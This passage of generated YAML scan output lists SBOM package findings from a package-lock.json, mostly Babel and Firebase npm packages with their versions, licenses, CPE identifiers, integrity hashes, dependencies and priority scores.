kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 44b56e7441c56f19
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @babel/runtime 7.29.2'
|
|
title: '@babel/runtime 7.29.2'
|
|
description: 'Package discovered: @babel/runtime 7.29.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 77d76c145d8ae8f1
|
|
name: '@babel/runtime'
|
|
version: 7.29.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@babel\/runtime:\@babel\/runtime:7.29.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40babel/runtime@7.29.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@babel/runtime/-/runtime-7.29.2.tgz
|
|
integrity: sha512-JiDShH45zKHWyGe4ZNVRrCjBz8Nh9TMmZG1kh4QTK8hCBTWBi8Da+i7s1fJw7/lYpM4ccepSNfqzZ/QvABBi5g==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 87ac29aa779666c3
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @emnapi/runtime 1.10.0'
|
|
title: '@emnapi/runtime 1.10.0'
|
|
description: 'Package discovered: @emnapi/runtime 1.10.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 90f3b7ad1f28a06b
|
|
name: '@emnapi/runtime'
|
|
version: 1.10.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@emnapi\/runtime:\@emnapi\/runtime:1.10.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40emnapi/runtime@1.10.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@emnapi/runtime/-/runtime-1.10.0.tgz
|
|
integrity: sha512-ewvYlk86xUoGI0zQRNq/mC+16R1QeDlKQy21Ki3oSYXNgLb45GV1P6A0M+/s6nyCuNDqe5VpaY84BzXGwVbwFA==
|
|
dependencies:
|
|
tslib: ^2.4.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 9dddf13ce7ce2b19
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @fastify/busboy 3.2.0'
|
|
title: '@fastify/busboy 3.2.0'
|
|
description: 'Package discovered: @fastify/busboy 3.2.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: c1858ce75e8e8799
|
|
name: '@fastify/busboy'
|
|
version: 3.2.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@fastify\/busboy:\@fastify\/busboy:3.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40fastify/busboy@3.2.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@fastify/busboy/-/busboy-3.2.0.tgz
|
|
integrity: sha512-m9FVDXU3GT2ITSe0UaMA5rU3QkfC/UXtCU8y0gSN/GugTqtVldOBWIB5V6V3sbmenVZUIpU6f+mPEO2+m5iTaA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 81749876eac20ae8
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @firebase/app-check-interop-types 0.3.2'
|
|
title: '@firebase/app-check-interop-types 0.3.2'
|
|
description: 'Package discovered: @firebase/app-check-interop-types 0.3.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 71780c9abc78bb02
|
|
name: '@firebase/app-check-interop-types'
|
|
version: 0.3.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@firebase\/app-check-interop-types:\@firebase\/app-check-interop-types:0.3.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/app-check-interop-types:\@firebase\/app_check_interop_types:0.3.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/app_check_interop_types:\@firebase\/app-check-interop-types:0.3.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/app_check_interop_types:\@firebase\/app_check_interop_types:0.3.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/app-check-interop:\@firebase\/app-check-interop-types:0.3.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/app-check-interop:\@firebase\/app_check_interop_types:0.3.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/app_check_interop:\@firebase\/app-check-interop-types:0.3.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/app_check_interop:\@firebase\/app_check_interop_types:0.3.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/app-check:\@firebase\/app-check-interop-types:0.3.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/app-check:\@firebase\/app_check_interop_types:0.3.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/app_check:\@firebase\/app-check-interop-types:0.3.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/app_check:\@firebase\/app_check_interop_types:0.3.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/app:\@firebase\/app-check-interop-types:0.3.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/app:\@firebase\/app_check_interop_types:0.3.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40firebase/app-check-interop-types@0.3.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@firebase/app-check-interop-types/-/app-check-interop-types-0.3.2.tgz
|
|
integrity: sha512-LMs47Vinv2HBMZi49C09dJxp0QT5LwDzFaVGf/+ITHe3BlIhUiLNttkATSXplc89A2lAaeTqjgqVkiRfUGyQiQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: efa61bee7bbbbcb1
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @firebase/app-types 0.9.2'
|
|
title: '@firebase/app-types 0.9.2'
|
|
description: 'Package discovered: @firebase/app-types 0.9.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: a5bfafbacd41f0a2
|
|
name: '@firebase/app-types'
|
|
version: 0.9.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@firebase\/app-types:\@firebase\/app-types:0.9.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/app-types:\@firebase\/app_types:0.9.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/app_types:\@firebase\/app-types:0.9.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/app_types:\@firebase\/app_types:0.9.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/app:\@firebase\/app-types:0.9.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/app:\@firebase\/app_types:0.9.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40firebase/app-types@0.9.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@firebase/app-types/-/app-types-0.9.2.tgz
|
|
integrity: sha512-oMEZ1TDlBz479lmABwWsWjzHwheQKiAgnuKxE0pz0IXCVx7/rtlkx1fQ6GfgK24WCrxDKMplZrT50Kh04iMbXQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 222f117f0d2bd962
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @firebase/auth-interop-types 0.2.3'
|
|
title: '@firebase/auth-interop-types 0.2.3'
|
|
description: 'Package discovered: @firebase/auth-interop-types 0.2.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 9b3141b15843b5a9
|
|
name: '@firebase/auth-interop-types'
|
|
version: 0.2.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@firebase\/auth-interop-types:\@firebase\/auth-interop-types:0.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/auth-interop-types:\@firebase\/auth_interop_types:0.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/auth_interop_types:\@firebase\/auth-interop-types:0.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/auth_interop_types:\@firebase\/auth_interop_types:0.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/auth-interop:\@firebase\/auth-interop-types:0.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/auth-interop:\@firebase\/auth_interop_types:0.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/auth_interop:\@firebase\/auth-interop-types:0.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/auth_interop:\@firebase\/auth_interop_types:0.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/auth:\@firebase\/auth-interop-types:0.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/auth:\@firebase\/auth_interop_types:0.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40firebase/auth-interop-types@0.2.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@firebase/auth-interop-types/-/auth-interop-types-0.2.3.tgz
|
|
integrity: sha512-Fc9wuJGgxoxQeavybiuwgyi+0rssr76b+nHpj+eGhXFYAdudMWyfBHvFL/I5fEHniUM/UQdFzi9VXJK2iZF7FQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 89a01c3b3491a5d7
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @firebase/component 0.6.9'
|
|
title: '@firebase/component 0.6.9'
|
|
description: 'Package discovered: @firebase/component 0.6.9'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 23f944b79804e251
|
|
name: '@firebase/component'
|
|
version: 0.6.9
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@firebase\/component:\@firebase\/component:0.6.9:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40firebase/component@0.6.9
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@firebase/component/-/component-0.6.9.tgz
|
|
integrity: sha512-gm8EUEJE/fEac86AvHn8Z/QW8BvR56TBw3hMW0O838J/1mThYQXAIQBgUv75EqlCZfdawpWLrKt1uXvp9ciK3Q==
|
|
dependencies:
|
|
'@firebase/util': 1.10.0
|
|
tslib: ^2.1.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: ac38e7507aa172f9
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @firebase/database 1.0.8'
|
|
title: '@firebase/database 1.0.8'
|
|
description: 'Package discovered: @firebase/database 1.0.8'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 49e5593cb4d5046f
|
|
name: '@firebase/database'
|
|
version: 1.0.8
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@firebase\/database:\@firebase\/database:1.0.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40firebase/database@1.0.8
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@firebase/database/-/database-1.0.8.tgz
|
|
integrity: sha512-dzXALZeBI1U5TXt6619cv0+tgEhJiwlUtQ55WNZY7vGAjv7Q1QioV969iYwt1AQQ0ovHnEW0YW9TiBfefLvErg==
|
|
dependencies:
|
|
'@firebase/app-check-interop-types': 0.3.2
|
|
'@firebase/auth-interop-types': 0.2.3
|
|
'@firebase/component': 0.6.9
|
|
'@firebase/logger': 0.4.2
|
|
'@firebase/util': 1.10.0
|
|
faye-websocket: 0.11.4
|
|
tslib: ^2.1.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: ed006e6af38f061f
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @firebase/database-compat 1.0.8'
|
|
title: '@firebase/database-compat 1.0.8'
|
|
description: 'Package discovered: @firebase/database-compat 1.0.8'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 2a2bae4730b1aafc
|
|
name: '@firebase/database-compat'
|
|
version: 1.0.8
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@firebase\/database-compat:\@firebase\/database-compat:1.0.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/database-compat:\@firebase\/database_compat:1.0.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/database_compat:\@firebase\/database-compat:1.0.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/database_compat:\@firebase\/database_compat:1.0.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/database:\@firebase\/database-compat:1.0.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/database:\@firebase\/database_compat:1.0.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40firebase/database-compat@1.0.8
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@firebase/database-compat/-/database-compat-1.0.8.tgz
|
|
integrity: sha512-OpeWZoPE3sGIRPBKYnW9wLad25RaWbGyk7fFQe4xnJQKRzlynWeFBSRRAoLE2Old01WXwskUiucNqUUVlFsceg==
|
|
dependencies:
|
|
'@firebase/component': 0.6.9
|
|
'@firebase/database': 1.0.8
|
|
'@firebase/database-types': 1.0.5
|
|
'@firebase/logger': 0.4.2
|
|
'@firebase/util': 1.10.0
|
|
tslib: ^2.1.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 04162de267eec152
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @firebase/database-types 1.0.5'
|
|
title: '@firebase/database-types 1.0.5'
|
|
description: 'Package discovered: @firebase/database-types 1.0.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 67e400eb3f7a92f4
|
|
name: '@firebase/database-types'
|
|
version: 1.0.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@firebase\/database-types:\@firebase\/database-types:1.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/database-types:\@firebase\/database_types:1.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/database_types:\@firebase\/database-types:1.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/database_types:\@firebase\/database_types:1.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/database:\@firebase\/database-types:1.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@firebase\/database:\@firebase\/database_types:1.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40firebase/database-types@1.0.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@firebase/database-types/-/database-types-1.0.5.tgz
|
|
integrity: sha512-fTlqCNwFYyq/C6W7AJ5OCuq5CeZuBEsEwptnVxlNPkWCo5cTTyukzAHRSO/jaQcItz33FfYrrFk1SJofcu2AaQ==
|
|
dependencies:
|
|
'@firebase/app-types': 0.9.2
|
|
'@firebase/util': 1.10.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 7028a090c3339aad
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @firebase/logger 0.4.2'
|
|
title: '@firebase/logger 0.4.2'
|
|
description: 'Package discovered: @firebase/logger 0.4.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: fdb02e46c7ca0cd4
|
|
name: '@firebase/logger'
|
|
version: 0.4.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@firebase\/logger:\@firebase\/logger:0.4.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40firebase/logger@0.4.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@firebase/logger/-/logger-0.4.2.tgz
|
|
integrity: sha512-Q1VuA5M1Gjqrwom6I6NUU4lQXdo9IAQieXlujeHZWvRt1b7qQ0KwBaNAjgxG27jgF9/mUwsNmO8ptBCGVYhB0A==
|
|
dependencies:
|
|
tslib: ^2.1.0
|
|
compliance:
|
|
